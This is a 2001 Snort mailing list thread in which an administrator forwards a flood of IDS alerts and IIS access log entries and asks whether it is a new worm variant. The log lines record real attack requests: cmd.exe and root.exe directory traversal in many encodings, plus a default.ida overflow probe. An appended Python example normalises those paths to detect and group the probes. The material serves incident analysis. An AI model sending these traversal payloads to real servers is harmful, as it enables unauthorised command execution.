Snort mailing list archives
Re: WEB-IIS Cmd attack
From: Dr SuSE <drsuse () drsuse org>
Date: Tue, 18 Sep 2001 15:01:35 GMT
I saw the same thing this morning. Apparently Snort logged 1380 of these attacks.
Hi,

Suddenly there is a flood of WEB-IIS Cmd attacks; this is just a tiny bit of it. Is this a new variant or script kiddies around?

TIA

Sep 18 16:50:14 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2031 -> 212.174.50.248:80
Sep 18 16:50:14 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2031 -> 212.174.50.248:80
Sep 18 16:50:15 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2109 -> 212.174.50.248:80
Sep 18 16:50:15 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2109 -> 212.174.50.248:80
Sep 18 16:50:16 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2177 -> 212.174.50.248:80
Sep 18 16:50:16 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2177 -> 212.174.50.248:80
Sep 18 16:50:16 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2243 -> 212.174.50.248:80
Sep 18 16:50:16 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2243 -> 212.174.50.248:80
Sep 18 16:50:17 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2294 -> 212.174.50.248:80
Sep 18 16:50:17 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2294 -> 212.174.50.248:80
Sep 18 16:50:18 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2522 -> 212.174.50.248:80
Sep 18 16:50:18 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2522 -> 212.174.50.248:80
Sep 18 16:50:18 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2613 -> 212.174.50.248:80
Sep 18 16:50:18 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2613 -> 212.174.50.248:80
Sep 18 16:50:19 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2673 -> 212.174.50.248:80
Sep 18 16:50:19 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2673 -> 212.174.50.248:80
Sep 18 16:50:20 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2726 -> 212.174.50.248:80
Sep 18 16:50:20 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2726 -> 212.174.50.248:80
Sep 18 16:50:24 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2766 -> 212.174.50.248:80
Sep 18 16:50:24 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:2766 -> 212.174.50.248:80
Sep 18 16:50:24 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3155 -> 212.174.50.248:80
Sep 18 16:50:24 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3155 -> 212.174.50.248:80
Sep 18 16:50:25 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3216 -> 212.174.50.248:80
Sep 18 16:50:25 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3216 -> 212.174.50.248:80
Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3271 -> 212.174.50.248:80
Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3271 -> 212.174.50.248:80
Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3317 -> 212.174.50.248:80
Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.209.96.133:3317 -> 212.174.50.248:80
Sep 18 16:56:00 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:3992 -> 212.174.50.248:80
Sep 18 16:56:00 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:3992 -> 212.174.50.248:80
Sep 18 16:56:01 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4172 -> 212.174.50.248:80
Sep 18 16:56:01 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4172 -> 212.174.50.248:80
Sep 18 16:56:03 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4291 -> 212.174.50.248:80
Sep 18 16:56:03 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4291 -> 212.174.50.248:80
Sep 18 16:56:05 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4382 -> 212.174.50.248:80
Sep 18 16:56:05 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4382 -> 212.174.50.248:80
Sep 18 16:56:06 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4575 -> 212.174.50.248:80
Sep 18 16:56:06 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4575 -> 212.174.50.248:80
Sep 18 16:56:08 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4674 -> 212.174.50.248:80
Sep 18 16:56:08 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4674 -> 212.174.50.248:80
Sep 18 16:56:10 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4770 -> 212.174.50.248:80
Sep 18 16:56:10 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4770 -> 212.174.50.248:80
Sep 18 16:56:11 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4875 -> 212.174.50.248:80
Sep 18 16:56:11 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:4875 -> 212.174.50.248:80
Sep 18 16:56:15 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:1137 -> 212.174.50.248:80
Sep 18 16:56:15 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:1137 -> 212.174.50.248:80
Sep 18 16:56:17 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:1483 -> 212.174.50.248:80
Sep 18 16:56:17 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:1483 -> 212.174.50.248:80
Sep 18 16:56:19 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:1616 -> 212.174.50.248:80
Sep 18 16:56:19 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:1616 -> 212.174.50.248:80
Sep 18 16:56:21 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:1789 -> 212.174.50.248:80
Sep 18 16:56:21 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:1789 -> 212.174.50.248:80
Sep 18 16:56:23 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:2014 -> 212.174.50.248:80
Sep 18 16:56:23 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:2014 -> 212.174.50.248:80
Sep 18 16:56:24 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:2099 -> 212.174.50.248:80
Sep 18 16:56:24 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.221.24.66:2099 -> 212.174.50.248:80
Sep 18 16:57:29 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:2606 -> 212.174.50.248:80
Sep 18 16:57:29 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:2606 -> 212.174.50.248:80
Sep 18 16:57:29 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:2649 -> 212.174.50.248:80
Sep 18 16:57:29 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:2649 -> 212.174.50.248:80
Sep 18 16:57:30 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:2672 -> 212.174.50.248:80
Sep 18 16:57:30 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:2672 -> 212.174.50.248:80
Sep 18 16:57:31 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:2702 -> 212.174.50.248:80
Sep 18 16:57:31 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:2702 -> 212.174.50.248:80
Sep 18 16:57:34 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:2729 -> 212.174.50.248:80
Sep 18 16:57:34 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:2729 -> 212.174.50.248:80
Sep 18 16:57:41 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3041 -> 212.174.50.248:80
Sep 18 16:57:41 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3041 -> 212.174.50.248:80
Sep 18 16:57:45 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3202 -> 212.174.50.248:80
Sep 18 16:57:45 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3202 -> 212.174.50.248:80
Sep 18 16:57:45 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3379 -> 212.174.50.248:80
Sep 18 16:57:45 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3379 -> 212.174.50.248:80
Sep 18 16:57:46 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3402 -> 212.174.50.248:80
Sep 18 16:57:46 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3402 -> 212.174.50.248:80
Sep 18 16:57:49 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3417 -> 212.174.50.248:80
Sep 18 16:57:49 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3417 -> 212.174.50.248:80
Sep 18 16:57:50 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3594 -> 212.174.50.248:80
Sep 18 16:57:50 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3594 -> 212.174.50.248:80
Sep 18 16:57:50 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3617 -> 212.174.50.248:80
Sep 18 16:57:50 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3617 -> 212.174.50.248:80
Sep 18 16:57:51 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3638 -> 212.174.50.248:80
Sep 18 16:57:51 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3638 -> 212.174.50.248:80
Sep 18 16:57:51 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3661 -> 212.174.50.248:80
Sep 18 16:57:51 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.230.34:3661 -> 212.174.50.248:80
Sep 18 16:59:16 gardiyan snort: WEB-IIS cmd.exe access [Classification:
Attempted User Privilege Gain Priority: 8]: 212.174.113.99:4917 -> 212.174.50.248:80
::ffff:212.209.96.133%134580160 - - [18/Sep/2001:16:50:12 +0300] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:13 +0300] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:14 +0300] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:15 +0300] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:16 +0300] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:16 +0300] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:17 +0300] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:18 +0300] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:18 +0300] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:19 +0300] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:20 +0300] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:24 +0300] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:24 +0300] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:25 +0300] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:26 +0300] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:26 +0300] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.147.6%134595336 - - [18/Sep/2001:16:50:59 +0300] "GET
/default.ida? XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66 - - [18/Sep/2001:16:55:56
+0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:55:58 +0300] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:00 +0300] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:01 +0300] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:03 +0300] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:05 +0300] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:06 +0300] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:08 +0300] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:10 +0300] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:11 +0300] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:15 +0300] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:17 +0300] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:19 +0300] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:21 +0300] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:23 +0300] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:24 +0300] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34 - - [18/Sep/2001:16:57:24
+0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:25 +0300] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:29 +0300] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:29 +0300] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:30 +0300] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:31 +0300] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:34 +0300] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:41 +0300] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:45 +0300] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:45 +0300] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:46 +0300] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:49 +0300] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:50 +0300] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:50 +0300] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:51 +0300] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:51 +0300] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.113.99 - - [18/Sep/2001:16:59:16 +0300] "GET
/default.ida? XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 - "" ""
----- End forwarded message -----
--
Togan Muftuoglu
_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users
"Flush twice....it's a long way to afghanistan"
---------------------------------------------
Microsoft is not installed.
http://www.drsuse.org/
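An added example, not part of the original messages: one way to triage the access log quoted above is to normalise each request path and check whether different sources sent the same ordered probe sequence, which points to automated tooling rather than manual attempts. The function names, the lenient overlong-byte folding and the 192.0.2.10 control line are assumptions made for this illustration.

```python
import re
from collections import defaultdict

# Constructed sample: entries copied from the access log quoted above and rejoined
# onto one line each; the 192.0.2.10 line is made up as a benign control.
SAMPLE_LOG = '''\
::ffff:212.209.96.133%134580160 - - [18/Sep/2001:16:50:12 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:16 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:20 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:25 +0300] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:192.0.2.10 - - [18/Sep/2001:16:52:00 +0300] "GET /index.html HTTP/1.0" 200 - "" ""
::ffff:212.221.24.66 - - [18/Sep/2001:16:55:56 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:03 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:15 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:21 +0300] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
'''

LINE_RE = re.compile(r'^::ffff:([\d.]+)\S* - - \[[^\]]+\] "GET (\S+) HTTP/[\d.]+" (\d{3})')
PCT = re.compile(rb'%([0-9a-fA-F]{2})')
OVERLONG = re.compile(rb'([\xc0\xc1])(.)', re.DOTALL)


def _fold(m):
    # Assumption: model a permissive decoder that accepts 2-byte overlong forms
    # (lead byte C0/C1) and keeps only the low 6 bits of the second byte.
    return bytes([((m.group(1)[0] & 0x1F) << 6) | (m.group(2)[0] & 0x3F)])


def normalise(raw_path, max_rounds=5):
    """Percent-decode until stable, fold overlong bytes, unify slashes and case."""
    data = raw_path.split("?", 1)[0].encode("latin-1")
    for _ in range(max_rounds):
        step = PCT.sub(lambda m: bytes([int(m.group(1), 16)]), data)
        step = OVERLONG.sub(_fold, step)
        if step == data:
            break
        data = step
    return data.decode("latin-1").replace("\\", "/").lower()


def is_probe(raw_path):
    """True if the decoded path climbs directories or targets a command shell."""
    path = normalise(raw_path)
    return "/../" in path or path.endswith(("/cmd.exe", "/root.exe"))


def probes_by_source(log_text):
    """Map source IP -> ordered list of (raw path, normalised path, status)."""
    out = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and is_probe(m.group(2)):
            out[m.group(1)].append((m.group(2), normalise(m.group(2)), int(m.group(3))))
    return dict(out)


def shared_sequences(log_text):
    """Group sources that sent the identical ordered probe sequence."""
    groups = defaultdict(list)
    for src, hits in probes_by_source(log_text).items():
        groups[tuple(raw for raw, _, _ in hits)].append(src)
    return [sorted(srcs) for srcs in groups.values() if len(srcs) > 1]


if __name__ == "__main__":
    for src, hits in probes_by_source(SAMPLE_LOG).items():
        print(src, len(hits), "probes, statuses", sorted({s for _, _, s in hits}))
    print("identical sequences from:", shared_sequences(SAMPLE_LOG))
```

The differently encoded requests collapse to one normalised path, and the status column shows whether any probe got something other than the 404 seen throughout this log.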